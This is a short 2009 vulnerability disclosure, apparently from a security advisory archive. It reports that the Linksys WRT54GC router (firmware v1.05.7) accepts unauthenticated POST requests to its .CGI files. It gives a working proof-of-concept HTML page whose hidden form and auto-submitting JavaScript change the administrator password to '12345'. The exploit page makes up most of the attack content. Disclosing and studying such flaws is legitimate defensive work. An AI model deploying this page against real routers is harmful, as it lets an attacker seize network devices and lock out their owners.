Linksys WRT54GC - Admin Password Change (POC)

2009-04-20T00:00:00
ID SECURITYVULNS:DOC:21708
Type securityvulns
Reporter Securityvulns
Modified 2009-04-20T00:00:00

Description

<!--


  • Gabriel Lima - gabriel@falandodeseguranca.com
  • www.falandodeseguranca.com

(English:) Linksys WRT54GC - Administration Password Change The Router WRT54GC doesn't seem to check authentication from the administrator in it's .CGI files, accepting any POST request, as a password change. Below, follows an example of a form that changes the password and administrator login to '12345'. Tested on model Linksys WRT54GC - Firmware Version: v1.05.7 - Local and Remote administration

(Portuguкs:) Linksys WRT54GC - Mudanзa de Senha O roteador WRT54GC parece nгo verificar a autenticaзгo do administrador em seus arquivos .CGI, aceitando qualquer envio de POST como o de mudanзa de senha. Abaixo, um exemplo de formulбrio que muda a senha e o login de administrador para 12345. Testado no modelo Linksys WRT54GC - Firmware Version: v1.05.7 - Administraзгo Local e remota.

Credits: Gabriel Lima. gabriel@falandodeseguranca.com -->

<html><body> <form method="POST" action="http://IP_ADDRESS:8080/administration.cgi" name="senha" ENCTYPE="multipart/form-data"> <INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21> <INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21> </form>

<!-- Cуdigo de envio automбtico do formulбrio -->

<SCRIPT language="JavaScript"> document.senha.submit(); </SCRIPT>

</body></html>